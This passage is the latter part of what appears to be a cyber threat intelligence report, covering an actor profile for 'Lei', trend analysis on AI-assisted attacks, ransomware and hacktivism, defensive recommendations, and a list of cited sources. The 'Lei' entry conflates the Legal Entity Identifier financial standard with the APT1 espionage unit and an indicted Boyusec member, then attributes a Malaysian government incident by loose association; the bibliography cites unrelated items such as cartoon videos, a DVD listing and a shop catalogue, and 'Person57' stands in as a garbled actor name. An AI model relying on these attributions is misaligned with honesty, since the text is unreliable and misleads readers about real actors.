• Lei (aka PLA Unit 61398, APT1, Comment Crew, Comment Panda, GIF89a, Byzantine Candor) The term “Lei” in the context of threat actors often refers to the Legal Entity Identifier (LEI) system, which is a global standard (ISO 17442) designed to uniquely identify legal entities in financial transactions.³² While not a threat actor itself, the LEI system is crucial for financial institutions to identify ICT service providers and monitor third-party risks, as mandated by regulations like DORA (Digital Operational Resilience Act).³² The LEI system aims to improve transparency, reduce redundancies, and help regulators monitor the stability of and threats to the financial system.³³ However, in a broader cybersecurity context, “Lei” could also refer to individuals or groups with that name involved in hacking. For instance, Xia Lei was indicted as part of the BOYUSEC HACKERS, a Chinese-based group accused of conspiring to hack into private corporate entities to steal sensitive internal information from financial, engineering, and technology industries.¹⁷ This group’s activities, along with those of PLA Unit 61398 (also known as APT1), a Chinese military unit alleged to be a source of Chinese computer hacking attacks, highlight the persistent threat of state-sponsored espionage and intellectual property theft.¹⁷ PLA Unit 61398 is known for targeting over 1,000 organizations, including government agencies, and has been cited by US intelligence agencies since 2002.³⁵
• Associated Incidents (from this report):
• Incident ID: INC022 – Alleged Leak of Vulnerability on the Website of Jabatan Kemajuan Islam Malaysia (JAKIM): The alleged leak of a vulnerability on the website of Jabatan Kemajuan Islam Malaysia (JAKIM), attributed to “Lei,” aligns with the activities of nation-state actors or state-sponsored groups known for exploiting vulnerabilities in government systems for espionage or strategic advantage.

V. Key Trends and Observations

The analysis of recent incidents and the broader threat landscape reveals several overarching patterns that warrant close attention from cybersecurity professionals and organizational leaders.

• The Proliferation of AI in Offensive Cyber Operations
  A notable trend is the increasing integration of Artificial Intelligence (AI) into offensive cyber operations. Over 57 distinct threat actors, with ties to nation-states like China, Iran, North Korea, and Russia, have been observed leveraging AI technology, particularly Google’s Gemini, to enhance their malicious cyber and information operations.1 While these actors are currently experimenting with AI primarily for productivity gains rather than developing entirely new capabilities, its impact is already significant. AI is being used for research, troubleshooting code, and creating and localizing content, making existing attack methods more efficient and scalable.1 For instance, AI tools are being exploited to build trust in B2B phishing campaigns.36 This indicates that AI is rapidly becoming a force multiplier for threat actors, enabling more convincing and automated attacks. The quality and volume of AI-enhanced social engineering and malware development are expected to increase, demanding a corresponding acceleration in defensive capabilities.
• The Evolving Landscape of Ransomware and Extortion
  Ransomware attacks have fundamentally evolved beyond mere data encryption to become sophisticated, multi-stage extortion operations. Groups like Ghost ransomware (DigitalGhost) are now routinely exfiltrating sensitive data before encrypting files, making data exposure the primary leverage point, even for organizations with robust backup systems.9 This shift means that the risk is no longer solely about data unavailability, which backups can mitigate, but about data confidentiality, intellectual property theft, and severe reputational damage.9 The emergence of Ransomware-as-a-Service (RaaS) models, exemplified by GhostLocker, further professionalizes the cybercriminal industry, complete with pricing structures, affiliate panels, and dedicated leak sites on the TOR network.29 This lowers the barrier to entry for less skilled attackers to launch impactful campaigns, signifying a mature and highly organized criminal ecosystem. The implication is that defense strategies must prioritize Data Loss Prevention (DLP) and robust detection of data exfiltration attempts prior to encryption, and incident response plans must account for public shaming and complex negotiation tactics.
• The Escalation and Hybridization of Hacktivism
  Hacktivist groups are demonstrating increasing aggression and capability, moving beyond traditional disruption to destructive attacks on critical infrastructure and engaging in financially motivated cybercrime. A significant 50% surge in hacktivist attacks on Industrial Control Systems (ICS) and Operational Technology (OT) was observed in March.26 Groups like the Z-PENTEST ALLIANCE explicitly target critical infrastructure, such as energy and water sectors, for geopolitical influence.18 The emergence of “multi-vector and coalition attacks” and the destructive capabilities of groups like C.A.S. (exfiltrating terabytes of data and destroying infrastructure) indicate a more potent threat.27 Furthermore, the fluidity in motivations is evident, as seen with GhostSec’s explicit pivot between hacktivism and financial cybercrime, and their recent announcement of a return to hacktivism.28 This suggests that hacktivist groups are becoming more adaptable, responding rapidly to geopolitical shifts and economic opportunities. Critical infrastructure organizations must elevate their defenses against hacktivists to the level of nation-state or sophisticated criminal threats, focusing on OT/ICS security and developing comprehensive crisis communication plans to address the psychological warfare aspects of these attacks.
• The Reliance on Commodity Tools and Unpatched Vulnerabilities
  Despite the rise of sophisticated actors, a significant portion of successful cyberattacks continues to stem from the exploitation of known weaknesses and the misuse of legitimate software tools. Groups like Ghost (DigitalGhost) frequently exploit “publicly known vulnerabilities” and leverage “commercially available adversary simulation tool[s]” like Cobalt Strike.9 Similarly, financially motivated actors like Vanilla Tempest (Microsoft’s DEV-0832) use legitimate tools such as AnyDesk, MEGA, Azure Storage Explorer, and AzCopy for remote monitoring, data synchronization, and large-scale data exfiltration.37 This approach lowers the technical barrier for attackers, as they do not need to develop zero-day exploits. This pattern underscores the enduring importance of foundational cybersecurity hygiene, timely patching of known exploited vulnerabilities, and strict monitoring of legitimate tools for anomalous or unauthorized behavior.3 Organizations must assume that adversaries will leverage these common methods, making prevention of exploitation and detection of suspicious activity involving trusted software paramount.
• Broader Implications for Cybersecurity Defense
  The increasing interconnectedness and specialization within the cybercrime ecosystem, where Initial Access Brokers (IABs) like ToyMaker facilitate ransomware groups, and RaaS providers offer sophisticated tools, demand a holistic threat intelligence approach.2 Organizations need to map the relationships and supply chains of adversaries to anticipate and defend against multi-stage, multi-actor campaigns, rather than focusing on isolated incidents or individual malware families. The weaponization of psychological warfare, as evidenced by Z-PENTEST ALLIANCE’s intimidation tactics and disinformation campaigns, necessitates a broader defense strategy that extends beyond technical controls.18 This includes robust crisis communication plans, public relations strategies, and internal psychological resilience training for key personnel. The rapid re-tooling and emergence of new threats following major takedowns, such as Squirrelwaffle filling the void left by Emotet, highlights the dynamic nature of the threat landscape.38 Organizations must maintain continuous threat intelligence monitoring and foster adaptive defenses that can quickly respond to shifts in adversary TTPs and the emergence of new tools or groups.

VI. Recommendations and Mitigations

To effectively counter the evolving cyber threat landscape, organizations must adopt a layered and proactive security posture.

• General Best Practices for Enhancing Organizational Cybersecurity Posture:

• Implement a Robust Vulnerability Management Program: Regularly scan for, prioritize, and promptly patch known exploited vulnerabilities, especially on internet-facing systems and critical infrastructure components. This foundational defense is crucial against groups like DigitalGhost, which frequently exploit unpatched systems.⁹
• Strengthen Identity and Access Management (IAM): Enforce Multi-Factor Authentication (MFA) across all accounts, particularly for privileged users and remote access. Implement the principle of least privilege, ensuring users and systems only have the minimum access required for their functions, thereby limiting potential damage in case of a compromise.³
• Enhance Endpoint Detection and Response (EDR/XDR): Deploy advanced EDR/XDR solutions capable of detecting sophisticated post-compromise activities, including EDR bypass attempts (as seen with FIN7) and the anomalous use of legitimate tools.³⁹ Actively monitor for suspicious PowerShell activity and other scripting misuse, as these are common attacker techniques.
• Improve Email and Web Security: Implement advanced email gateways and web filters to detect and block sophisticated phishing campaigns, including those enhanced by AI for realism.³⁶ Conduct regular, adaptive security awareness training that addresses evolving social engineering tactics, including AI-generated content and “ClickFix” methods, to empower employees as a strong line of defense.¹⁷
• Data Protection and Recovery: Implement Data Loss Prevention (DLP) tools and continuous network monitoring to detect and prevent data exfiltration attempts, which are now a primary leverage point for ransomware groups.⁹ Maintain immutable and isolated backups for rapid operational recovery from ransomware attacks, but recognize that data exfiltration poses a distinct and ongoing risk that requires separate mitigation strategies.
• Network Segmentation: Segment networks, particularly for critical systems, sensitive data environments, and Operational Technology (OT)/Industrial Control Systems (ICS), to limit lateral movement and contain the impact of breaches.¹⁰ This prevents an initial compromise from escalating into a widespread systemic failure.
• Comprehensive Logging and Monitoring: Prioritize comprehensive logging, including command-line interface (CLI) activity, and establish a baseline for normal host and user behavior to detect anomalous activity on endpoints and across the network.¹⁰ Proactive threat hunting, where human analysts actively seek out and investigate unusual activity, is also highly recommended.⁴
• Specific, Actionable Recommendations Tailored to Counter Identified Threat Actors:

• Against AI-Enhanced Threats (e.g., Nation-State Actors – Person57 ¹): Organizations should invest in and deploy AI-driven security tools and analytics platforms capable of detecting subtle anomalies in content, code, and user behavior that indicate AI-generated attacks or AI-assisted operations. Continuous updates to security awareness training should include specific examples and warnings about AI-generated phishing, deepfakes, and highly personalized social engineering lures, as these threats become increasingly convincing.
• Against Ransomware Groups (e.g., DigitalGhost, BlackH0le ⁹): Focus on early-stage intrusion detection, such as unusual PowerShell execution, Cobalt Strike beacons, and web shell deployment, to disrupt attacks before ransomware encryption or significant data exfiltration occurs. Develop and regularly test robust incident response plans that specifically account for data exfiltration scenarios, potential public shaming on leak sites, and the complexities of ransom negotiations. Implement strict controls over the use of legitimate administrative tools within the environment and monitor for their anomalous usage, as these are frequently repurposed by adversaries.
• Against Hacktivists Targeting Critical Infrastructure (e.g., Z-PENTEST ALLIANCE, Team 1722 ¹⁸): Conduct specialized OT/ICS cybersecurity assessments and implement defense-in-depth strategies tailored to industrial control systems, including air-gapping where feasible and robust perimeter security. Develop and exercise comprehensive crisis communication plans to counter psychological warfare, disinformation campaigns, and public pressure tactics often employed by these groups.

Works cited

1. Google: Over 57 Nation-State Threat Groups Using AI for Cyber Operations, accessed June 5, 2025, https://thehackernews.com/2025/01/google-over-57-nation-state-threat.html
2. ToyMaker Uses LAGTOY to Sell Access to CACTUS Ransomware …, accessed June 5, 2025, https://thehackernews.com/2025/04/toymaker-uses-lagtoy-to-sell-access-to.html
3. Threat Actors: Common Types & Best Defenses Against Them | Splunk, accessed June 5, 2025, https://www.splunk.com/en_us/blog/learn/threat-actors.html
4. What is a Cyber Threat Actor? | CrowdStrike, accessed June 5, 2025, https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/
5. This saddens me to no end: Gumball and TMNT actor Nicolas Cantu verbally abuses Uber driver and passenger, including homophobia, antisemitism and threats of physical assault. – Reddit, accessed June 5, 2025, https://www.reddit.com/r/TMNT/comments/17y3cwf/this_saddens_me_to_no_end_gumball_and_tmnt_actor/
6. A legal threat to a podcast app for using open RSS – Podnews, accessed June 5, 2025, https://podnews.net/update/legal-threat-lawyer
7. The Amazing World of Gumball | Hack the Internet | Cartoon Network – YouTube, accessed June 5, 2025, https://www.youtube.com/watch?v=nRwBWamtEzc
8. Cyberspace Hack | The Amazing World of Gumball | Cartoon Network – YouTube, accessed June 5, 2025, https://www.youtube.com/watch?v=j2wazCmNYaw
9. Ghost Ransomware Attacks: Understanding the Threat and … – Veeam, accessed June 5, 2025, https://www.veeam.com/blog/ghost-ransomware-attacks-understanding-the-threat-and-strengthening-defenses.html
10. #StopRansomware: Ghost (Cring) Ransomware | CISA, accessed June 5, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
11. MSL 843: Logistics & Supply Chain Management – IIT Delhi, accessed June 5, 2025, https://web.iitd.ac.in/~ravi1/scm2019.htm
12. MCL 726: Supply Chain Management – IIT Delhi, accessed June 5, 2025, https://web.iitd.ac.in/~ravi1/scm2011.htm
13. Italian ministries hit by pro-Russian cyberattacks – TVP World, accessed June 5, 2025, https://tvpworld.com/84466557/-pro-russian-hackers-target-italian-government-and-public-service-websites
14. George Hotz – Wikipedia, accessed June 5, 2025, https://en.wikipedia.org/wiki/George_Hotz
15. ScatterBrain: Unmasking the Shadow of PoisonPlug’s Obfuscator | Google Cloud Blog, accessed June 5, 2025, https://cloud.google.com/blog/topics/threat-intelligence/scatterbrain-unmasking-poisonplug-obfuscator
16. Security researchers hack BlackLock ransomware gang in push …, accessed June 5, 2025, https://www.itpro.com/security/ransomware/security-researchers-hack-blacklock-ransomware-gang
17. Weekly Intelligence Report – 16 May 2025 – CYFIRMA, accessed June 5, 2025, https://www.cyfirma.com/news/weekly-intelligence-report-16-may-2025/
18. Z-PENTEST ALLIANCE – Cyber Intelligence Bureau – Orange …, accessed June 5, 2025, https://www.orangecyberdefense.com/fileadmin/global/CyberIntelligenceBureau/Gangs_Investigations/z-pentest/Z-Pentest_Alliance.pdf
19. Female Yakuza Tale – Inquisition and Torture | Amazon.com.br, accessed June 5, 2025, https://www.amazon.com.br/Female-Yakuza-Tale-Inquisition-Torture/dp/B000AQKUWW
20. Female Yakuza Tale – Inquisition and Torture [DVD 883164100492| eBay, accessed June 5, 2025, https://www.ebay.com/itm/354938630592
21. Catalog – Sportlet Store, accessed June 5, 2025, https://sportlet.store/en/home?resultsPerPage=200
22. rockyou.txt – Computer Science and Engineering, accessed June 5, 2025, https://www.cse.msu.edu/~cse231/PracticeOfComputingUsingPython/04_Functions1/Password_Cracking/rockyou.txt
23. Hacking group focused on Central America dumps 10 terabytes of …, accessed June 5, 2025, https://cyberscoop.com/central-american-hacking-group-releases-emails/
24. Tactics and Motivations of Modern Hacktivists – CYFIRMA, accessed June 5, 2025, https://www.cyfirma.com/research/tactics-and-motivations-of-modern-hacktivists/
25. Warning: Cyber attacks have been used to create hatred against Cambodians – Cofact, accessed June 5, 2025, https://blog.cofact.org/warning-cyber-attacks-have-been-used-to-create-hatred-against-cambodians/
26. Rise in hacktivist threats to critical sector, as pro-Russian groups …, accessed June 5, 2025, https://industrialcyber.co/reports/rise-in-hacktivist-threats-to-critical-sector-as-pro-russian-groups-cause-50-rise-in-ics-ot-attacks-in-march/
27. Cyble Hacktivists Target Critical Infrastructure, Move Into Ransomware, accessed June 5, 2025, https://cyble.com/blog/hacktivists-infrastructure-move-into-ransomware/
28. Threat Actor Profile – GhostSec – Outpost24, accessed June 5, 2025, https://outpost24.com/blog/threat-actor-profile-ghostsec/
29. Dark Web Profile: GhostSec – SOCRadar® Cyber Intelligence Inc., accessed June 5, 2025, https://socradar.io/dark-web-profile-ghostsec/
30. Threat Actor Profile – Guacamaya hacktivist group – Outpost24, accessed June 5, 2025, https://outpost24.com/blog/threat-actor-profile-guacamaya/
31. Guacamaya (hacktivist group) – Wikipedia, accessed June 5, 2025, https://en.wikipedia.org/wiki/Guacamaya_(hacktivist_group)
32. DORA News – LEI and Digitalization – LEIReg, accessed June 5, 2025, https://www.leireg.de/en/guide-news/news/dora/
33. Frequently Asked Questions – Office of Financial Research (OFR), accessed June 5, 2025, https://www.financialresearch.gov/data/legal-entity-identifier/faqs/
34. BOYUSEC HACKERS – FBI, accessed June 5, 2025, https://www.fbi.gov/wanted/cyber/boyusec-hackers
35. PLA Unit 61398 – Wikipedia, accessed June 5, 2025, https://en.wikipedia.org/wiki/PLA_Unit_61398
36. Breaking Cyber News From Cyberint, accessed June 5, 2025, https://cyberint.com/news-feed/
37. Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector, accessed June 5, 2025, https://thehackernews.com/2024/09/microsoft-warns-of-new-inc-ransomware.html
38. Hackers Using Squirrelwaffle Loader to Deploy Qakbot and Cobalt Strike, accessed June 5, 2025, https://thehackernews.com/2021/10/hackers-using-squirrelwaffle-loader-to.html
39. FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks | SentinelOne, accessed June 5, 2025, https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/
40. Nation-State Cyber Actors | Cybersecurity and Infrastructure Security Agency CISA, accessed June 5, 2025, https://www.cisa.gov/topics/cyber-threats-and-advisories/nation-state-cyber-actors